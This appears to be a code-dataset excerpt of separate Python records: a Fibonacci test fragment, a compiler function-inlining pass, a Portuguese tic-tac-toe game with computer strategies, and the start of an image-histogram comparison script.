(4, [0, 2, 8, 34]),
(10, [0, 2, 8, 34, 144, 610, 2584, 10946, 46368, 196418]),
],
)
def test_even_fibonacci_nth(nth, res):
"""Test n first terms."""
inefibgen = efib_gen()
infslice = [next(inefibgen) for _ in range(nth)]
assert list(efib_gen(nth)) == infslice == res
| StarcoderdataPython |
1807592 | # TODO: Ensure that functions marked for inlining aren't recursive to
# prevent infinite loops.
from typing import Collection, List, Sequence, Set, Tuple
from asts import lowered, visitor
from scope import Scope
calc_threshold = lambda value: value * 20
def expand_inline(tree: lowered.LoweredASTNode, level: int) -> lowered.LoweredASTNode:
"""
Inline unnecessary or trivial functions to make the program run faster.
Parameters
----------
tree: lowered.LoweredASTNode
The tree without any inlined functions.
level: int
How aggressive the inline expander should be in optimising.
Returns
-------
lowered.LoweredASTNode
The tree with as many functions inlines as is reasonable.
"""
level = calc_threshold(level)
finder = _Finder()
finder.run(tree)
targets = generate_targets(finder.funcs, finder.defined_funcs, level)
inliner = _Inliner(targets)
return inliner.run(tree)
class _Scorer(visitor.LoweredASTVisitor[int]):
"""
A visitor that gives a numeric weight to a piece of the AST.
This visitor gives more weight to more complex structures like
conditionals compared to simple names.
"""
def visit_block(self, node: lowered.Block) -> int:
return 5 + sum(expr.visit(self) for expr in node.body)
def visit_cond(self, node: lowered.Cond) -> int:
return (
6 + node.pred.visit(self) + node.cons.visit(self) + node.else_.visit(self)
)
def visit_define(self, node: lowered.Define) -> int:
return 4 + node.value.visit(self)
def visit_func_call(self, node: lowered.FuncCall) -> int:
return 2 + node.func.visit(self) + sum(map(self.run, node.args))
def visit_function(self, node: lowered.Function) -> int:
return 7 + node.body.visit(self)
def visit_name(self, node: lowered.Name) -> int:
return 0
def visit_native_operation(self, node: lowered.NativeOperation) -> int:
return (
1
+ node.left.visit(self)
+ (0 if node.right is None else node.right.visit(self))
)
def visit_scalar(self, node: lowered.Scalar) -> int:
return 0
def visit_vector(self, node: lowered.Vector) -> int:
element_score = sum(elem.visit(self) for elem in node.elements)
return (3 + element_score) if element_score else 0
class _Finder(visitor.LoweredASTVisitor[None]):
def __init__(self) -> None:
self.funcs: List[lowered.Function] = []
self.defined_funcs: Set[lowered.Function] = set()
def visit_block(self, node: lowered.Block) -> None:
for expr in node.body:
expr.visit(self)
def visit_cond(self, node: lowered.Cond) -> None:
node.pred.visit(self)
node.cons.visit(self)
node.else_.visit(self)
def visit_define(self, node: lowered.Define) -> None:
node.value.visit(self)
if isinstance(node.value, lowered.Function):
self.defined_funcs.add(node.value)
def visit_func_call(self, node: lowered.FuncCall) -> None:
node.func.visit(self)
for arg in node.args:
arg.visit(self)
def visit_function(self, node: lowered.Function) -> None:
node.body.visit(self)
self.funcs.append(node)
def visit_name(self, node: lowered.Name) -> None:
return
def visit_native_operation(self, node: lowered.NativeOperation) -> None:
node.left.visit(self)
if node.right is not None:
node.right.visit(self)
def visit_scalar(self, node: lowered.Scalar) -> None:
return
def visit_vector(self, node: lowered.Vector) -> None:
for elem in node.elements:
elem.visit(self)
class _Inliner(visitor.LoweredASTVisitor[lowered.LoweredASTNode]):
def __init__(self, targets: Collection[lowered.Function]) -> None:
self.current_scope: Scope[lowered.Function] = Scope(None)
self.targets: Collection[lowered.Function] = targets
def is_target(self, node: lowered.LoweredASTNode) -> bool:
"""Check whether a function node is marked for inlining."""
for target in self.targets:
if node == target:
return True
return False
def visit_block(self, node: lowered.Block) -> lowered.Block:
return lowered.Block(node.span, [expr.visit(self) for expr in node.body])
def visit_cond(self, node: lowered.Cond) -> lowered.Cond:
return lowered.Cond(
node.span,
node.pred.visit(self),
node.cons.visit(self),
node.else_.visit(self),
)
def visit_define(self, node: lowered.Define) -> lowered.Define:
value = node.value.visit(self)
if isinstance(value, lowered.Function):
self.current_scope[node.target] = value
return lowered.Define(node.span, node.target, value)
def visit_func_call(self, node: lowered.FuncCall) -> lowered.LoweredASTNode:
func = node.func.visit(self)
args = [arg.visit(self) for arg in node.args]
if self.is_target(func):
return inline_function(node.span, func, args)
if isinstance(func, lowered.Name) and func in self.current_scope:
actual_func = self.current_scope[func]
return inline_function(node.span, actual_func, args)
return lowered.FuncCall(node.span, func, args)
def visit_function(self, node: lowered.Function) -> lowered.Function:
return lowered.Function(node.span, node.params, node.body.visit(self))
def visit_name(self, node: lowered.Name) -> lowered.Name:
return node
def visit_native_operation(
self, node: lowered.NativeOperation
) -> lowered.NativeOperation:
return lowered.NativeOperation(
node.span,
node.operation,
node.left.visit(self),
None if node.right is None else node.right.visit(self),
)
def visit_scalar(self, node: lowered.Scalar) -> lowered.Scalar:
return node
def visit_vector(self, node: lowered.Vector) -> lowered.Vector:
return lowered.Vector(
node.span, node.vec_type, [elem.visit(self) for elem in node.elements]
)
class _Replacer(visitor.LoweredASTVisitor[lowered.LoweredASTNode]):
__the_instance = None
def __new__(cls, *_, **__):
if cls.__the_instance is None:
cls.__the_instance = super().__new__(cls)
return cls.__the_instance
def __init__(self, inlined: Scope[lowered.LoweredASTNode]) -> None:
self.inlined: Scope[lowered.LoweredASTNode] = inlined
def run(self, node: lowered.LoweredASTNode) -> lowered.LoweredASTNode:
return node.visit(self) if self.inlined else node
def visit_block(self, node: lowered.Block) -> lowered.Block:
return lowered.Block(node.span, [expr.visit(self) for expr in node.body])
def visit_cond(self, node: lowered.Cond) -> lowered.Cond:
return lowered.Cond(
node.span,
node.pred.visit(self),
node.cons.visit(self),
node.else_.visit(self),
)
def visit_define(self, node: lowered.Define) -> lowered.Define:
return lowered.Define(node.span, node.target, node.value.visit(self))
def visit_func_call(self, node: lowered.FuncCall) -> lowered.LoweredASTNode:
return lowered.FuncCall(
node.span,
node.func.visit(self),
[arg.visit(self) for arg in node.args],
)
def visit_function(self, node: lowered.Function) -> lowered.Function:
original_inlined = self.inlined
str_params = [param.value for param in node.params]
edited = {key: value for key, value in self.inlined if key not in str_params}
self.inlined = Scope.from_dict(edited)
new_body = node.body.visit(self)
self.inlined = original_inlined
return lowered.Function(node.span, node.params, new_body)
def visit_name(self, node: lowered.Name) -> lowered.LoweredASTNode:
return self.inlined[node] if node in self.inlined else node
def visit_native_operation(
self, node: lowered.NativeOperation
) -> lowered.NativeOperation:
return lowered.NativeOperation(
node.span,
node.operation,
node.left.visit(self),
None if node.right is None else node.right.visit(self),
)
def visit_scalar(self, node: lowered.Scalar) -> lowered.Scalar:
return node
def visit_vector(self, node: lowered.Vector) -> lowered.Vector:
return lowered.Vector(
node.span, node.vec_type, [elem.visit(self) for elem in node.elements]
)
def generate_targets(
funcs: Sequence[lowered.Function],
defined_funcs: Collection[lowered.Function],
threshold: int = 0,
) -> Collection[lowered.Function]:
"""
Generate the total inlining score for every function found in the
AST.
Parameters
----------
funcs: Sequence[lowered.Function]
All the `Function` nodes found in the AST.
defined_funcs: Collection[lowered.Function]
A set of functions that are directly tied to a `Define` node.
threshold: int
The highest score that is allowed to remain in the final result.
If it is `0` then it will count and collect the score of every
single function given.
Returns
-------
Collection[lowered.Function]
A list of all the function nodes whose overall score is less
than the threshold.
"""
allow_all = threshold == 0
base_scorer = _Scorer()
scores = []
for func in funcs:
score = base_scorer.run(func.body)
score += 1 if func in defined_funcs else 3
if allow_all or score <= threshold:
scores.append(func)
return scores
def inline_function(
span: Tuple[int, int],
func: lowered.Function,
args: Sequence[lowered.LoweredASTNode],
) -> lowered.LoweredASTNode:
"""Merge a function and its argument to produce an expression."""
inlined = {param.value: arg for param, arg in zip(func.params, args)}
replacer = _Replacer(Scope.from_dict(inlined))
result = replacer.run(func.body)
result.span = span
return result
| StarcoderdataPython |
6444243 | <filename>ProjetoGaloFinal.py
# <NAME> 99108
def eh_posicao_marcada(pm):
""" Pretende descobrir se o argumento inserido e ou nao uma posicao marcada.
:param pm: Um int, posicao marcada. (-1 ou 1).
:return: Um bool, veracidade do argumento.
"""
if type(pm) != int or pm != 1 and pm != -1:
return False
return True
def eh_tabuleiro(tab):
""" Pretende descobrir se o argumento inserido e ou nao um tabuleiro.
:param tab: Um tuple constituido por 3 tuples, tabuleiro.
:return: Um bool, veracidade do argumento.
"""
if not isinstance(tab, tuple) or len(tab) != 3:
return False
for i in tab:
if not isinstance(i, tuple) or len(i) != 3:
return False
for e in i:
if type(e) != int or not eh_posicao_marcada(e) and e != 0:
return False
return True
def eh_posicao(p):
""" Pretende descobrir se o argumento inserido e ou nao uma posicao de um tabuleiro.
:param p: Um int, posicao de um tabuleiro (1 a 9).
:return: Um bool, veracidade do argumento.
"""
if type(p) != int:
return False
elif not 1 <= p <= 9: # posicoes de 1 a 9
return False
return True
def obter_coluna(tab, c):
""" Recebe um tabuleiro e o valor de uma coluna devolve um vetor com os valores da coluna pretendida do tabuleiro.
:param tab: Um tuple, tabuleiro.
:param c: Um int, valor da coluna do tabuleiro (1 a 3).
:return: Um tuple, coluna do tabuleiro.
"""
if not eh_tabuleiro(tab) or type(c) != int or not 1 <= c <= 3:
raise ValueError('obter_coluna: algum dos argumentos e invalido')
coluna = ()
for i in range(len(tab)):
e = c - 1 # retira o elemento correspondente a coluna inserida de cada linha do tab
coluna += (tab[i][e], )
return coluna
def obter_linha(tab, li):
""" Recebe um tabuleiro e o valor de uma linha e devolve um vetor com os valores da linha pretendida do tabuleiro.
:param tab: Um tuple, tabuleiro.
:param li: Um int, valor da linha do tabuleiro. (1 a 3).
:return: Um tuple, linha do tabuleiro.
"""
if not eh_tabuleiro(tab) or type(li) != int or not 1 <= li <= 3:
raise ValueError('obter_linha: algum dos argumentos e invalido')
for i in range(len(tab)):
i = li - 1 # linhas = 3 tuplos de tab
return tab[i]
def obter_diagonal(tab, d):
""" Recebe um tabuleiro e o valor de uma diagonal e devolve um vetor com os valores da diagonal
pretendida do tabuleiro.
:param tab: Um tuple, tabuleiro.
:param d: Um int, valor da diagonal do tabuleiro. 1 para a diagonal
descendente da esquerda para a direita e 2 para a diagonal
ascendente da esquerda para a direita.
:return: Um tuple, diagonal do tabuleiro.
"""
if not eh_tabuleiro(tab) or type(d) != int or not 1 <= d <= 2:
raise ValueError('obter_diagonal: algum dos argumentos e invalido')
res = ()
e = - 1
for i in range(len(tab)):
if d == 1:
e += 1 # retira os elementos da diagonal 1
res += (tab[i][e], )
elif d == 2:
tab = tab[::-1] # inverte a ordem de tab
e += 1 # retira os elementos da diagonal 2
res += (tab[i][e], )
return res
def tabuleiro_posicoes(tab):
""" Recebe um tabuleiro e devolve um tuplo com as posicoes de um tabuleiro, cujos index vao de 0 a 8,
de modo a obter as posicoes de cada posicao marcada.
:param tab: Um tuple, tabuleiro.
:return: Um tuple, tabuleiro com index de posicoes.
"""
if not eh_tabuleiro(tab):
raise ValueError('tabuleiro_posicoes: o argumento e invalido')
tab_p = ()
for i in tab:
for e in i:
tab_p += (e, )
return tab_p
def tabuleiro_str(tab):
""" Recebe um tabuleiro e devolve a representacao externa do tabuleiro.
:param tab: Um tuple, tabuleiro.
:return: Uma str, tabuleiro convertido para a representacao externa.
"""
def posicao_str(p):
""" Funcao auxiliar, converte as posicoes marcadas ou livres na sua representacao externa.
:param p: Um int, posicao marcada ou livre do tabuleiro.
:return: Uma str, posicao convertida para a representacao externa.
"""
if not eh_posicao_marcada(p) and p != 0:
raise ValueError('posicao_str: o argumento e invalido')
elif p == 1:
return 'X'
elif p == - 1:
return 'O'
elif p == 0:
return ' '
if not eh_tabuleiro(tab):
raise ValueError('tabuleiro_str: o argumento e invalido')
tab_rep = ''
for i in tab:
for e in i:
tab_rep += posicao_str(e)
# converte os valores das posicoes do tabuleiro e guarda-os numa string
return ' ' + tab_rep[0] + ' | ' + tab_rep[1] + ' | ' + tab_rep[2] + ' \n-----------\n ' + tab_rep[3] + ' | ' +\
tab_rep[4] + ' | ' + tab_rep[5] + ' \n-----------\n ' + tab_rep[6] + ' | ' + tab_rep[7] + ' | ' +\
tab_rep[8] + ' '
def converte_posicao(tab, p):
""" Recebe um tabuleiro e uma posicao do tabuleiro e converte o valor da posicao de um tabuleiro numa
posicao marcada de -1 a 1
:param tab: Um tuple, tabuleiro.
:param p: Um int, posicao do tabuleiro.
:return: Um int, posicao marcada do tabuleiro.
"""
if not eh_tabuleiro(tab) or not eh_posicao(p):
raise ValueError('converte_posicao: algum dos argumentos e invalido')
p_linha = {1: 1, 2: 1, 3: 1, 4: 2, 5: 2, 6: 2, 7: 3, 8: 3, 9: 3}
# dicionario de linhas para cada posicao 1 a 9
p_coluna = {1: 1, 2: 2, 3: 3, 4: 1, 5: 2, 6: 3, 7: 1, 8: 2, 9: 3}
# dicionario de colunas para cada posicao 1 a 9
return obter_linha(tab, p_linha[p])[p_coluna[p] - 1]
def eh_posicao_livre(tab, p):
""" Recebe um tabuleiro e uma posicao do tabuleiro e pretende descobrir se a posicao inserida corresponde ou nao a
uma posicao livre do tabuleiro. Livre se a posicao for igual a 0.
:param tab: Um tuple, tabuleiro.
:param p: Um int, posicao do tabuleiro.
:return: Um bool, veracidade do argumento.
"""
if not eh_tabuleiro(tab) or not eh_posicao(p):
raise ValueError('eh_posicao_livre: algum dos argumentos e invalido')
if converte_posicao(tab, p) == 1 or converte_posicao(tab, p) == - 1:
return False
return True
def obter_posicoes_livres(tab):
""" Recebe um tabuleiro e devolve um vetor ordenado com todas a posicoes livres do tabuleiro.
:param tab: Um tuple, tabuleiro.
:return: Um tuple, posicoes livres do tabuleiro.
"""
if not eh_tabuleiro(tab):
raise ValueError('obter_posicoes_livres: o argumento e invalido')
posicoes_livres = ()
for p in range(len(tabuleiro_posicoes(tab))): # 0 <= p <= 8
if eh_posicao_livre(tab, p + 1):
posicoes_livres += (p + 1, )
return posicoes_livres
def jogador_ganhador(tab):
""" Recebe um tabuleiro e devolve um valor inteiro a indicar o jogador que ganhou a partida,
sendo o valor igual a 1 se ganhou o jogador que joga com 'X', -1 se ganhou o jogador que joga com 'O',
ou 0 se nenhum jogador ganhou.
:param tab: Um tuple, tabuleiro.
:return: Um int, jogador ganhador da partida.
"""
if not eh_tabuleiro(tab):
raise ValueError('jogador_ganhador: o argumento e invalido')
for n in range(1, 4):
linha = obter_linha(tab, n)
coluna = obter_coluna(tab, n)
if linha[0] == linha[1] == linha[2]:
return linha[0]
elif coluna[0] == coluna[1] == coluna[2]:
return coluna[0]
for d in range(1, 3):
diagonal = obter_diagonal(tab, d)
if diagonal[0] == diagonal[1] == diagonal[2]:
return diagonal[0]
return 0
def marcar_posicao(tab, pm, pl):
""" Recebe um tabuleiro, jogador e posicao do tabuleiro e devolve um tabuleiro modificado com a nova
marca do jogador numa posicao, ou seja, apos a jogada do mesmo.
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:param pl: Um int, posicao livre do tabuleiro.
:return: Um tuple, tabuleiro modificado.
"""
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm) or not eh_posicao(pl) or not eh_posicao_livre(tab, pl):
raise ValueError('marcar_posicao: algum dos argumentos e invalido')
new_tab = ()
for i in range(len(tabuleiro_posicoes(tab))): # 0 <= i <= 8
if i == pl - 1:
new_tab += (pm, )
else:
new_tab += (tabuleiro_posicoes(tab)[i], )
return (new_tab[0:3], ) + (new_tab[3:6], ) + (new_tab[6:9], )
def escolher_posicao_manual(tab):
""" Realiza a leitura de uma posicao introduzida manualmente por um jogador e devolve essa posicao escolhida.
:param tab: Um tuple, tabuleiro.
:return: Um int, posicao escolhida manualmente pelo jogador.
"""
if not eh_tabuleiro(tab):
raise ValueError('escolher_posicao_manual: o argumento e invalido')
p = int(input('Turno do jogador. Escolha uma posicao livre: '))
if not eh_posicao(p) or not eh_posicao_livre(tab, p):
raise ValueError('escolher_posicao_manual: a posicao introduzida e invalida')
return p
def vitoria(tab, pm):
""" Recebe um tabuleiro e um jogador. Criterio de estrategia: se o jogador tiver duas das suas pecas em linha
e uma posicao livre, entao devolve essa posicao livre (ganhando o jogo).
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:return: Uma lst, posicoes livres que devem ser marcadas pelo jogador.
"""
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
raise ValueError('vitoria: algum dos argumentos e invalido')
pos = [] # possibilidades de vitoria
for i in range(1, 4):
linha = obter_linha(tab, i)
coluna = obter_coluna(tab, i)
# testar linhas
if linha[0] == linha[1] == pm and eh_posicao_livre(tab, i * 3):
pos += [i * 3]
elif linha[0] == linha[2] == pm and eh_posicao_livre(tab, i * 3 - 1):
pos += [i * 3 - 1]
elif linha[1] == linha[2] == pm and eh_posicao_livre(tab, i * 3 - 2):
pos += [i * 3 - 2]
# testar colunas
elif coluna[0] == coluna[1] == pm and eh_posicao_livre(tab, i + 6):
pos += [6 + i]
elif coluna[0] == coluna[2] == pm and eh_posicao_livre(tab, i + 3):
pos += [3 + i]
elif coluna[1] == coluna[2] == pm and eh_posicao_livre(tab, i):
pos += [i]
for i in range(1, 3):
diagonal = obter_diagonal(tab, i)
# testar diagonais
if diagonal[0] == diagonal[1] == pm and eh_posicao_livre(tab, 10 // i - i):
pos += [10 // i - i]
elif diagonal[0] == diagonal[2] == pm and eh_posicao_livre(tab, 5):
pos += [5]
elif diagonal[1] == diagonal[2] == pm and eh_posicao_livre(tab, i ** 3 - (i - 1)):
pos += [i ** 3 - (i - 1)]
return sorted(pos)
def bloqueio(tab, pm):
""" Recebe um tabuleiro e um jogador. Criterio de estrategia: se o adversario tiver duas das suas pecas
em linha e uma posicao livre, entao devolve essa posicao livre (bloqueando a vitoria do adversario).
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:return: Uma lst, posicoes livres que devem ser marcadas pelo jogador.
"""
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
raise ValueError('bloqueio: algum dos argumentos e invalido')
if pm == 1:
return vitoria(tab, -1)
elif pm == -1:
return vitoria(tab, 1)
def bifurcacao(tab, pm):
""" Recebe um tabuleiro e um jogador. Criterio de estrategia: se o jogador tiver duas linhas/ colunas/ diagonais
que se intersetam, onde cada uma contem uma das suas pecas e a posicao de intersecao estiver livre, entao devolve
essa posicao livre (criando 2 formas de ganhar).
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:return: Uma lst, posicoes livres que devem ser marcadas pelo jogador.
"""
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
raise ValueError('bifurcacao: algum dos argumentos e invalido')
pos = [] # lista de possibilidades de bifurcacao
# testar linhas com colunas
for i in range(1, 4):
if pm in obter_linha(tab, 1) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, i):
# se a jogador tiver uma pm na linha 1 e numa coluna, a intersecao e uma bifurcacao
if -pm in obter_linha(tab, 1) or -pm in obter_coluna(tab, i):
# so pode ser bifurcacao se o adversario nao tiver uma pm nessa linha ou coluna
pos += []
else:
pos += [i]
for i in range(1, 4):
if pm in obter_linha(tab, 2) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, i + 3):
# se a jogador tiver uma pm na linha 2 e numa coluna, a intersecao e uma bifurcacao
if -pm in obter_linha(tab, 2) or -pm in obter_coluna(tab, i):
# so pode ser bifurcacao se o adversario nao tiver uma pm nessa linha ou coluna
pos += []
else:
pos += [i + 3]
for i in range(1, 4):
if pm in obter_linha(tab, 3) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, i + 6):
# se a jogador tiver uma pm na linha 3 e numa coluna, a intersecao e uma bifurcacao
if -pm in obter_linha(tab, 3) or -pm in obter_coluna(tab, i):
# so pode ser bifurcacao se o adversario nao tiver uma pm nessa linha ou coluna
pos += []
else:
pos += [i + 6]
# testar diagonais com linhas e colunas
for i in range(1, 4):
if (pm in obter_diagonal(tab, 1) and pm in obter_linha(tab, i)) \
or (pm in obter_diagonal(tab, 1) and pm in obter_coluna(tab, i)):
# se a jogador tiver uma pm na diagonal 1 e numa linha / coluna, a intersecao e uma bifurcacao
if eh_posicao_livre(tab, -3 + 4 * i):
if (-pm in obter_diagonal(tab, 1) or -pm in obter_linha(tab, i)) and \
(-pm in obter_diagonal(tab, 1) or -pm in obter_coluna(tab, i)):
# so pode ser bifurcacao se o adversario nao tiver uma pm nessa diagonal ou linha/ coluna
pos += []
else:
pos += [-3 + 4 * i]
for i in range(1, 4):
if pm in obter_diagonal(tab, 2) and pm in obter_linha(tab, i) and eh_posicao_livre(tab, 1 + 2 * i):
# se a jogador tiver uma pm na diagonal 2 e numa linha, a intersecao e uma bifurcacao
if -pm in obter_diagonal(tab, 2) or -pm in obter_linha(tab, i):
# so pode ser bifurcacao se o adversario nao tiver uma pm nessa diagonal ou linha
pos += []
else:
pos += [1 + 2 * i]
for i in range(1, 4):
if pm in obter_diagonal(tab, 2) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, -2 * i + 9):
# se a jogador tiver uma pm na diagonal 2 e numa coluna, a intersecao e uma bifurcacao
if -pm in obter_diagonal(tab, 2) or -pm in obter_coluna(tab, i):
# so pode ser bifurcacao se o adversario nao tiver uma pm nessa diagonal ou coluna
pos += []
else:
pos += [-2 * i + 9]
return sorted(pos)
def bloqueio_bifurcacao(tab, pm):
""" Recebe um tabuleiro e um jogador. Criterio de estrategia: se o adversario tiver apenas uma bifurcacao,
entao devolve essa posicao livre de intersecao (de modo a bloquear a jogada do adversario). Senao devolve
uma posicao livre que faca um dois em linha.
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:return: Um int, posicao livre que deve ser marcada pelo jogador OU
Uma lst, posicoes livres que devem ser marcadas pelo jogador.
"""
def canto_contrario(tab, pm):
""" Funcao auxiliar, uma lista com todos os cantos contrarios livres.
(canto contrario = simetria de reflexao das linhas/ colunas)
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:return: Uma lst, cantos contrarios livres.
"""
tab_p = tabuleiro_posicoes(tab)
pos = [] # possibilidades de cantos contrarios livres
if tab_p[0] == pm or tab[8] == pm and eh_posicao_livre(tab, 3):
pos += [3]
elif tab_p[2] == pm or tab[6] == pm and eh_posicao_livre(tab, 1):
pos += [1]
elif tab_p[0] == pm or tab[8] == pm and eh_posicao_livre(tab, 8):
pos += [8]
elif tab_p[2] == pm or tab[6] == pm and eh_posicao_livre(tab, 9):
pos += [9]
return sorted(pos)
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
raise ValueError('bloqueio_bifurcacao: algum dos argumentos e invalido')
if pm == 1:
if len(bifurcacao(tab, -1)) > 1: # advesario tem mais de que 1 bifurcacao possivel
if converte_posicao(tab, 5) == 1:
return lateral_vazio(tab)
elif converte_posicao(tab, 5) == -1:
return canto_contrario(tab, pm)
else:
return bifurcacao(tab, -1)
elif pm == -1:
if len(bifurcacao(tab, 1)) > 1: # advesario tem mais de que 1 bifurcacao possivel
if converte_posicao(tab, 5) == -1:
return lateral_vazio(tab)
elif converte_posicao(tab, 5) == 1:
return canto_contrario(tab, pm)
else:
return bifurcacao(tab, 1)
def centro(tab):
""" Recebe um tabuleiro. Criterio de estrategia: se a posicao central estiver livre,
entao devolve essa posicao livre.
:param tab: Um tuple, tabuleiro
:return: Um int, posicao livre que deve ser marcada pelo jogador.
"""
if not eh_tabuleiro(tab):
raise ValueError('centro: o argumento e invalido')
elif eh_posicao_livre(tab, 5):
return 5
def canto_oposto(tab, pm):
""" Recebe um tabuleiro e um jogador. Criterio de estrategia: se o adversario estiver num canto e o
canto diagonalmente oposto for uma posicao livre, entao devolve essa posicao livre.
:param tab: Um tuple, tabuleiro.
:param pm: Um int, identificacao do jogador. 1 para o jogador 'X' e -1 para o jogador 'O'.
:return: Um int, posicao livre que deve ser marcada pelo jogador.
"""
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
raise ValueError('canto_oposto: algum dos argumentos e invalido')
tab_p = tabuleiro_posicoes(tab)
if tab_p[0] != pm and eh_posicao_marcada(tab_p[0]) and eh_posicao_livre(tab, 9):
return 9
elif tab_p[2] != pm and eh_posicao_marcada(tab_p[2]) and eh_posicao_livre(tab, 7):
return 7
elif tab_p[6] != pm and eh_posicao_marcada(tab_p[6]) and eh_posicao_livre(tab, 3):
return 3
elif tab_p[8] != pm and eh_posicao_marcada(tab_p[8]) and eh_posicao_livre(tab, 1):
return 1
def canto_vazio(tab):
""" Recebe um tabuleiro. Criterio da estrategia: se um canto for uma posicao livre,
entao devolve essa posicao livre.
:param tab: Um tuple, tabuleiro.
:return: Um int, posicao livre que deve ser marcada pelo jogador.
"""
if not eh_tabuleiro(tab):
raise ValueError('canto_vazio: o argumento e invalido')
cantos = (1, 3, 7, 9)
for e in cantos:
if eh_posicao_livre(tab, e) is True:
return e
def lateral_vazio(tab):
""" Recebe um tabuleiro. Criterio da estrategia: se uma posicao lateral for livre,
entao devolve essa posicao livre.
:param tab: Um tuple, tabuleiro.
:return: Um int, posicao livre que deve ser marcada pelo jogador.
"""
if not eh_tabuleiro(tab):
raise ValueError('lateral_vazio: o argumento e invalido')
laterais = (2, 4, 6, 8)
for e in laterais:
if eh_posicao_livre(tab, e) is True:
return e
def eh_estrategias(estr):
""" Pretende descobrir se o argumento inserido e ou nao uma estrategia de jogo.
:param estr: Uma str, estrategia de jogo.
:return: Um bool, veracidade do argumento.
"""
if not isinstance(estr, str) or estr != 'basico' and estr != 'normal' and estr != 'perfeito':
return False
return True
def escolher_posicao_auto(tab, pm, estr):
""" Recebe um tabuleiro, um jogador, e uma estrategia e escolhe uma posicao automaticamente,
de acordo com os parametros inseridos.
:param tab: Um tuple, tabuleiro.
:param pm: Um int, posicao marcada.
:param estr: Uma str, estrategia de jogo.
:return: Um int, posicao escolhida automaticamente.
"""
if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm) or not eh_estrategias(estr):
raise ValueError('escolher_posicao_auto: algum dos argumentos e invalido')
elif estr == 'basico':
return centro(tab) or canto_vazio(tab) or lateral_vazio(tab) # ordem das estrategias 'basico'
elif estr == 'normal':
if len(vitoria(tab, pm)) >= 1: # ordem das estrategias 'normal'
return vitoria(tab, pm)[0]
elif len(bloqueio(tab, pm)) >= 1:
return bloqueio(tab, pm)[0]
else:
return centro(tab) or canto_oposto(tab, pm) or canto_vazio(tab) or lateral_vazio(tab)
elif estr == 'perfeito':
if len(vitoria(tab, pm)) >= 1: # ordem das estrategias 'perfeito'
return vitoria(tab, pm)[0]
elif len(bloqueio(tab, pm)) >= 1:
return bloqueio(tab, pm)[0]
elif len(bifurcacao(tab, pm)) >= 1:
return bifurcacao(tab, pm)[0]
elif bloqueio_bifurcacao(tab, pm) or len(bloqueio_bifurcacao(tab, pm)) >= 1:
return bloqueio_bifurcacao(tab, pm) or bloqueio_bifurcacao(tab, pm)[0]
else:
return centro(tab) or canto_oposto(tab, pm) or canto_vazio(tab) or lateral_vazio(tab)
def jogo_do_galo(player, estr):
""" Funcao principal do jogo, permite jogar um jogo completo de Jogo do Galo
de um jogador contra o computador.
:param player: Uma str, identificacao do jogador.
:param estr: Uma str, estrategia de jogo.
:return: Uma str, jogo completo
"""
def player_pm(player):
""" Funcao auxiliar, converte a identificacao do jogador (str) em posicoes marcadas (int).
:param player: Uma str, identificacao do jogador
:return: Um int, posicao marcada.
"""
if player == 'X':
return 1
elif player == 'O':
return -1
if not isinstance(player, str) or player != 'X' and player != 'O' or not eh_estrategias(estr):
raise ValueError('jogo_do_galo: algum dos argumentos e invalido')
print('Bem-vindo ao JOGO DO GALO.' + '\n' + 'O jogador joga com \'' + player + '\'.')
t = ((0, 0, 0), (0, 0, 0), (0, 0, 0))
while len(obter_posicoes_livres(t)) > 0:
if player == 'X':
pc = 'O' # se o jogador for o 'X', entao o pc joga com 'O'
p = escolher_posicao_manual(t)
print(tabuleiro_str(marcar_posicao(t, player_pm(player), p))) # apos o jogador escolher a posicao de
t = marcar_posicao(t, player_pm(player), p) # jogada o tabuleiro e modificado e representado
if jogador_ganhador(t) == player_pm(player):
return player # se o jogador ganhar o jogo acaba
elif len(obter_posicoes_livres(t)) == 0:
return 'EMPATE' # se ja nao houver mais posicoes livres o jogo acaba
p = escolher_posicao_auto(t, player_pm(pc), estr)
print('Turno do computador' + ' ' + '(' + estr + '):' + '\n' + # apos o pc escolher uma posicao
tabuleiro_str(marcar_posicao(t, player_pm(pc), p))) # de jogada (auto) o tabuleiro e
t = marcar_posicao(t, player_pm(pc), p) # modificado e representado
if jogador_ganhador(t) == player_pm(pc):
return pc # se o pc ganhar o jogo acaba
else:
pc = 'X' # se o jogador for o 'X', entao o pc joga com 'O'
p = escolher_posicao_auto(t, player_pm(pc), estr)
print('Turno do computador' + ' ' + '(' + estr + '):' + '\n' + # apos o pc escolher uma posicao
tabuleiro_str(marcar_posicao(t, player_pm(pc), p))) # de jogada (auto) o tabuleiro e
t = marcar_posicao(t, player_pm(pc), p) # modificado e representado
if jogador_ganhador(t) == player_pm(pc):
return pc # se o pc ganhar o jogo acaba
elif len(obter_posicoes_livres(t)) == 0:
return 'EMPATE' # se ja nao houver mais posicoes livres o jogo acaba
p = escolher_posicao_manual(t) # apos o jogador escolher a posicao de
print(tabuleiro_str(marcar_posicao(t, player_pm(player), p))) # jogada o tabuleiro e modificado e
t = marcar_posicao(t, player_pm(player), p) # representado
if jogador_ganhador(t) == player_pm(player):
return player # se o jogador ganhar o jogo acaba
return 'EMPATE' # se ja nao houver mais posicoes livres o jogo acaba
| StarcoderdataPython |
3308120 | <reponame>alffore/tileimagen
"""
Pruebas de comparacion de histogramas de imagenes
https://www.pyimagesearch.com/2014/07/14/3-ways-compare-histograms-using-opencv-python/
